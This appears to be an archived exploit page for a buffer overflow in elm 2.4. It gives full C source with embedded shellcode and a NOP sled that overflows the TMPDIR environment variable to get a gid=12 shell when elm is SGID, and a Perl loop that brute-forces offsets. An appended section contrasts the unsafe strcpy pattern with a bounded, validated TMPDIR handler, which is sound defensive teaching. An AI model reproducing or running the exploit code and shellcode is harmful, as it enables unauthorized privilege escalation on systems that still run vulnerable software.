Elm v2.4 buffer overflow exploit which provides a gid=12 shell if /usr/bin/elm is SGID. Tested on Slackware 3.6, elm 2.4PL25. Perl script to find offsets included.
03d1978ea3b8ab5173fda42c7786dc04993514aae31b5c97466470d36a8dddcf
/* (linux)elm[2.4] buffer overflow, by v9[v9@fakehalo.org]. this will give you
a gid=12 shell if /usr/bin/elm is SGID(=2755). elm rejects most user
defined vars after 254<characters but TMPDIR overflows a few characters
before that in some situations. both elm 2.4 and 2.5(current) have this
overflow, but elm 2.5's can be handled differently. (elm_bof25.c)
note: try offsets of 100, as noted in the perl script below. 800 worked on
my old slackware 3.6, (elm 2.4 PL25). it is possible you may need to modify
this to your system. (probably not though)
yeah, i obviously was looking around the elm source to find this. too much
free time for me. although, i also noticed that just typing too much in elm
will make it segfault. :)
here is a quick perl script to run offsets (until ctrl-c):
#!/usr/bin/perl
$i=$ARGV[0]; # starting offset, taken from the command line
while(1){
print "offset: $i.\n";
system("rm /tmp/mbox.\$USER;./elm_bof25 $i");
$i++; # or $i+=100; if you want to be speedy. (which you do)
} */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define DEFAULT_OFFSET 800
static char exec[]=
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76\x08\x31\xc0\x88"
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[242];
int i,offset;
long ret;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
printf("return address: 0x%lx, offset: %d.\n\nwhen ELM loads press \"m\" to send mail, then enter\ngarbage values until you get to the message editor(vi).\nyou also might want to run \"reset\".\n",ret,offset);
sleep(5);
for(i=2;i<242;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(238-strlen(exec));i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
setenv("TMPDIR",bof,1);
execlp("/usr/bin/elm","elm",(char *)0);
return 1; /* only reached if the exec fails */
}
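For comparison, here is the defensive side of the same pattern: a privileged (SUID/SGID) program reading a user-controlled environment variable such as TMPDIR into a fixed-size buffer. This is an added example written for this page, not elm's source; the TMPDIR_MAX value of 254 is an assumption taken from the 254-character limit mentioned in the note above, and the function names are made up for the example. It shows the unbounded copy that causes this class of overflow beside a bounded, validated version that rejects over-long or non-printable values and falls back to a safe default.

```c
/* Added example (not elm's code): bounded handling of an attacker-controlled
   environment variable in a privileged program. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TMPDIR_MAX 254   /* assumption: the per-variable limit noted for elm */

/* Vulnerable pattern: strcpy() into a fixed buffer, no length check at all.
   A value longer than the destination overwrites whatever follows it on the
   stack (saved registers, return address). Shown only for contrast. */
int copy_tmpdir_unsafe(const char *value, char *dst)
{
    strcpy(dst, value);
    return 1;
}

/* Hardened version: measure the value without running past dstlen, enforce a
   maximum length, require an absolute path made of printable ASCII, and only
   then copy with an explicit bound and NUL terminator.
   Returns 1 if the value was accepted and copied, 0 if it was rejected. */
int copy_tmpdir_safe(const char *value, char *dst, size_t dstlen)
{
    size_t n;

    if (value == NULL || dstlen == 0)
        return 0;

    /* Length scan that stops at dstlen, so an unterminated or huge value
       cannot make us read far past the data we would accept anyway. */
    for (n = 0; n < dstlen && value[n] != '\0'; n++)
        ;
    if (n == 0 || n >= dstlen || n > TMPDIR_MAX)
        return 0;

    if (value[0] != '/')             /* require an absolute path */
        return 0;

    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)value[i];
        if (c < 0x20 || c >= 0x7f)   /* printable ASCII only */
            return 0;
    }

    memcpy(dst, value, n);
    dst[n] = '\0';
    return 1;
}

/* Reads TMPDIR from the environment; falls back to /tmp when the value is
   missing or rejected. Returns 1 if the environment value was used. */
int select_tmpdir(char *dst, size_t dstlen)
{
    if (copy_tmpdir_safe(getenv("TMPDIR"), dst, dstlen))
        return 1;
    snprintf(dst, dstlen, "/tmp");
    return 0;
}

int main(void)
{
    char tmpdir[256];
    int from_env = select_tmpdir(tmpdir, sizeof tmpdir);
    printf("using %s (%s)\n", tmpdir, from_env ? "from TMPDIR" : "default");
    return 0;
}
```

The printable-ASCII restriction is stricter than a length check alone needs to be; it is included because a temporary-directory path has no legitimate reason to contain control or high bytes, and rejecting them early makes the accepted input easy to reason about. The essential fix is the explicit bound before the copy and the fallback to a known-good default, independent of whether the program is SGID.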